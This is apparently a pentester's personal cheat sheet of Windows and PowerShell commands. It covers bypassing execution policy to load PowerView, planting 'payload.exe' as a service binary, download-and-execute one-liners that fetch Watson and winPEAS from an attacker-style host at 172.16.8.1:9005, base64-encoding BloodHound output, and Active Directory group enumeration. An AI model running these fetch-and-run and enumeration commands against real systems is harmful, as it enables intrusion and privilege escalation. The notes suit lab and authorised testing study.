This note was created when I was not very familiar with the Windows environment. I didn't know how to restart the machine from the command line, copy files, or import PowerShell scripts, etc.
Import Module to Powershell
Copy powershell - ep bypass
Import-Module .\PowerView.ps1
# or
. .\PowerView.ps1
Copy # copy files
copy payload.exe "C:\Program Files\Service.exe"
# copy directory name Tools to new directory "MyTools"
xcopy Tools "C:\Users\Administrator\Desktop\MyTools" / E / I
Copy # Rename Payload.exe to Service.exe
ren Payload.exe Service.exe
Copy # using certutil
certutil - urlcache -split -f https: // example.com / example.txt example.txt
# using powershell Invoke-WebRequest
iwr - Uri "http://172.16.8.1:9005/PowerView.ps1" - O "PowerView.ps1"
# Download and Execute script
iex (( New-Object Net.WebClient).DownloadString( "http://172.16.8.1:9005/Invoke-Watson.ps1" ))
# or
$watson_exec = [System.Text.Encoding]::UTF8.GetString((iwr -Uri "http://172.16.8.1:9005/Invoke-Watson.ps1" -UseBasicParsing).Content)
iex $watson_exec
Download and Execute Invoke-WinPEAS
Copy iex (( New-Object Net.WebClient).DownloadString( "http://172.16.8.1:9005/Invoke-winPEAS.ps1" ))
# or
$winpeas_ps1 = [System.Text.Encoding]::UTF8.GetString((iwr -Uri "http://172.16.8.1:9005/Invoke-winPEAS.ps1" -UseBasicParsing).Content)
iex $winpeas_ps1
Copy # Shutdown now
shutdown / s / t 0 / f
# Restart
shutdown / r / t 0 / f
Copy [ convert ]::ToBase64String(( Get-Content - path "20230908145747_BloodHound.zip" - Encoding byte))
Copy Get-LocalGroup
net localgroup
Get-ADGroup - filter * - properties * | select SAMAccountName , Description
Copy Get-LocalGroupMember - Group "Administrators"
Get-ADGroupMember - Identity Administrators | Select-Object name , objectClass , distinguishedName